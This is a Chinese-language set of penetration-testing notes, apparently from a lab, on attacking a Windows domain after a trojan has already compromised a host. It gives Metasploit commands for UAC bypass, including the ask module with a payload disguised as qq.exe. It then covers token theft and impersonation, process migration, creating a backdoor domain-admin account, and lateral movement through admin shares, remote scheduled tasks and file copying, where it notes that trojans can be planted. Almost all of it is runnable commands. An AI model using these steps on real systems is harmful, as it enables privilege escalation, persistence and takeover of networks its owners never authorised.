域安全-UAC提权 需要UAC提权进行的操作:(基本在控制面板) 1.系统的更新 2.增加/修改账户 3.修改UAC设置等 借助msf
1.已经通过木马使目标计算机被控制 成功上线 2.进行UAC提权尝试(失败率比较高) use exploit/windows/local/bypassuac
(多用来进攻32位系统) show options set SESSION 1 //具体是几号机器就填相应的数字 exploit 开始攻击/run也可以执行
//如果攻击成功,会给你一个新的session号 进入新的session号 getuid getsystem ask模块进行uac提权 background
先把木马放到后台 use exploit/windows/local/ask 加载ask模块 info 查看漏洞信息 set SESSION
1 //使用漏洞在1号木马控制的目标上 set FILENAME qq.exe //伪装成文件名为qq set LHOST
[本地的ip地址] //设置本地监听地址 exploit 会在用户桌面上弹出一个允许qq启动,用户选择yes,成功
getuid //发现还不是system getsystem //可以提高到最高 域安全-令牌窃取 纵向移动 横向移动 令牌-token
更类似于web安全中的cookie 伪造令牌 可以实现提权 也就是纵向移动提权方法的一种 核心:kerberos协议 借助工具msf 步骤:
1.木马成功使目标计算机上线 2.进入一个session use incognito list_tokens -u impersonate_token
TEST1\\Administrator(这个地方是上面出现的令牌中想要盗用的令牌的名字 反斜杠写两个) //Successfully shell
//即可获得冒用的相应的执行权限 whoami 纵向移动(这里介绍一种进程迁移注入的提权方法) (移动到哪个进程 就可以以哪个进程的名义
做该进程持有者相应权限的事情) 1.首先不论任何手段获得system权限 此时权限是AUTHORITY\SYSTEM 我们需要横向移动到域管理员的权限上
2.进程迁移提权 migrate [相应进程的pid] //当前进程迁移到其他进程后 权限可能会根据进程权限而改变 可以找高权限的类似
TEST1\Administrator 域管理员的权限 get uid //此时已经是域控管理员权限就够了 不能getsystem 否则会失去管理员的权限
3.令牌伪造提权: (这一步下才可以执行add_user命令) (也就是上面的伪造令牌 这里重复介绍一下) use incognito list_tokens
-u impersonate_token TEST1\\Administrator 3.后续操作 (纵向移动提权成功以后的横向移动以及后渗透)
#add_user [新用户账号] [新用户密码] -h [域控服务器ip地址] add_user lyj Test123 -h
192.168.109.136 add_group_user "domain admins" lyj -h 192.168.109.136 shell net
group "domain admins" //只能在域控制器上使用的命令 横向移动(纵向移动提权成功以后的情况下的横向移动) 1.使用纵向移动的方法
不论使用了哪种提权方法 这里默认已经获得了TEST1\Administrator 域控管理员权限 并且成功建立了另一个管理员权限的账户lyj
2.默认情况下域控windows会开放c盘的共享 方法1: 进入网络驱动器的映射 3.点击完成 登录刚才建立的新的管理员账户 方法2:命令行操作 net
use \\192.168.109.136\c$ "Test123" /user:lyj net share net use dir
\\192.168.109.136\c$ type \\192.168.109.136\c$\a.txt 方法2-2: 当对方 开启了135 445端口
时可以使用ipc$ 或者管理员什么都没有修改那么可以使用ipc$ 可以使用的权限更高 net use \\192.168.109.136\ipc$
"Test123" /user:lyj net use 方法2-3: 远程访问(以远程访问进程为例) tasklist /S
192.168.109.136 /U lyj /P Test123 方法2-4: 在内网被控制的机器的C盘创建一个文本文件a.txt 然后cmd执行命令
可以把本机的文件拷贝到域控电脑C盘上的 这里也可以考虑传木马等 都很轻松了 copy a.txt \\192.168.109.136\c$
方法2-5:计划任务 9点51执行cmd命令并且输出到c盘下的1.txt内 at \\192.168.109.136 9:51PM cmd.exe /c
"ipconfig > c:/1.txt" 方法2-6:针对比较新的系统 schtasks /create /s 192.168.109.136 /tn
test1 /sc onstart /tr c:/a.bat /ru system /f